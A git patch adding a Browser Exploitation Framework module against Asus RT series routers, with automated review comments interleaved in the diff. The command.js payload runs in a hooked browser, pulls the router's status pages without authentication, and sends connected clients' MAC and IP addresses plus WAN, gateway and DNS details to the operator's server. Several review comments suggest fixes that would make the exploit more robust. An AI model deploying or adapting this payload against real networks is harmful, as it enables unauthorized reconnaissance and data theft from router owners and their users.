From 32fab589d6cc3f07723fa0e099022a814c1a7d47 Mon Sep 17 00:00:00 2001
From: Brendan Coles
Date: Tue, 20 May 2014 16:59:40 +0000
Subject: [PATCH] Add Asus RT Series Get Info module
---
.../router/asus_rt_series_get_info/command.js | 48 +++++++++++++++++++
.../asus_rt_series_get_info/config.yaml | 15 ++++++
.../router/asus_rt_series_get_info/module.rb | 19 ++++++++
3 files changed, 82 insertions(+)
create mode 100644 modules/exploits/router/asus_rt_series_get_info/command.js
create mode 100644 modules/exploits/router/asus_rt_series_get_info/config.yaml
create mode 100644 modules/exploits/router/asus_rt_series_get_info/module.rb
diff --git a/modules/exploits/router/asus_rt_series_get_info/command.js b/modules/exploits/router/asus_rt_series_get_info/command.js
new file mode 100644
index 000000000..af0edc582
--- /dev/null
+++ b/modules/exploits/router/asus_rt_series_get_info/command.js
@@ -0,0 +1,48 @@
+//
+// Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+ var target_ip = '<%= @target_ip %>';
+
+ load_script = function(url) {
+ var s = document.createElement("script");
+ s.type = 'text/javascript';
+ s.src = url;
+ document.body.appendChild(s);
+ }
+
+ get_info = function() {
+
+ beef.debug(target_ip + " - gathering info...");
+
+ var clients = Client_IP_MAC;
+ var wanip = wanlink_ipaddr();
+ var netmask = wanlink_netmask();
+ var gateway = wanlink_gateway();
+ var dns = wanlink_dns();
+
+ beef.debug(target_ip + " - Clients: " + clients);
+ beef.debug(target_ip + " - WAN IP: " + wanip);
+ beef.debug(target_ip + " - Gateway: " + gateway);
+ beef.debug(target_ip + " - DNS: " + dns);
+ beef.debug(target_ip + " - gathering info completed");
+
+ beef.net.send("<%= @command_url %>", <%= @command_id %>,
+ "clients=" + clients +
+ "&wanip=" + wanip +
+ "&netmask=" + netmask +
+ "&gateway=" + gateway +
+ "&dns=" + dns
+ );
+ }
+
+ beef.debug(target_ip + " - loading scripts...");
+ load_script("http://" + target_ip + "/status.asp");
+ load_script("http://" + target_ip + "/get_wan_status.asp");
+ setTimeout("get_info()", 10000);
+
+});
+
diff --git a/modules/exploits/router/asus_rt_series_get_info/config.yaml b/modules/exploits/router/asus_rt_series_get_info/config.yaml
new file mode 100644
index 000000000..eecefb5d5
--- /dev/null
+++ b/modules/exploits/router/asus_rt_series_get_info/config.yaml
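Review bot: In command.js, `load_script` and `get_info` are assigned without `var`, so in non-strict code both become implicit globals on the page. `setTimeout("get_info()", 10000)` passes a string that is evaluated like `eval`, and it only resolves because `get_info` leaked into global scope. Declaring both locally and passing the function reference removes the two problems together: `var load_script = function(url) {`, `var get_info = function() {`, `setTimeout(get_info, 10000);`. Separately, the values read from the device are concatenated into the `beef.net.send` payload without `encodeURIComponent`, so an `&` or `=` inside any of them would blur the field boundaries in the stored result.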
@@ -0,0 +1,15 @@
+#
+# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+ module:
+ asus_rt_series_get_info:
+ enable: true
+ category: ["Exploits", "Router"]
+ name: "Asus RT Series Get Info"
+ description: "This module retieves information from an Asus RT series router unauthenticated. The information retrieved includes all connected LAN clients (MAC address and LAN IP) and WAN link details (WAN IP address, gateway, DNS server)."
+ authors: ["bcoles"]
+ target:
+ working: ["ALL"]
diff --git a/modules/exploits/router/asus_rt_series_get_info/module.rb b/modules/exploits/router/asus_rt_series_get_info/module.rb
new file mode 100644
index 000000000..864a6e373
--- /dev/null
+++ b/modules/exploits/router/asus_rt_series_get_info/module.rb
@@ -0,0 +1,19 @@
+#
+# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+class Asus_rt_series_get_info < BeEF::Core::Command
+
+ def self.options
+ return [
+ { 'name' => 'target_ip', 'ui_label' => 'Target IP', 'value' => '192.168.1.1' }
+ ]
+ end
+
+ def post_execute
+ save({'result' => @datastore['result']})
+ end
+
+end
+
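Review bot: The `description` string in config.yaml misspells `retieves` (it should be `retrieves`), and the trailing "unauthenticated" reads more clearly as "without authentication". The text also gives no indication of which firmware versions answer these requests, nor a reference for the underlying issue. Adding one would let a reader judge whether a given device is exposed and whether a vendor fix applies.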
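Review bot: `post_execute` in module.rb saves `@datastore['result']`, but the script in command.js posts fields named `clients`, `wanip`, `netmask`, `gateway` and `dns` and never a field named `result`. How the datastore is populated is not visible in this patch, so this is inferred: if it is keyed by the posted field names, the saved record would be empty. Either save the fields by name or have the script send a single `result=` value. `self.options` also takes `target_ip` as free text that command.js interpolates into a quoted JavaScript string and a URL, so checking that it is a well-formed IP address before use would keep a stray quote or slash from altering the generated script.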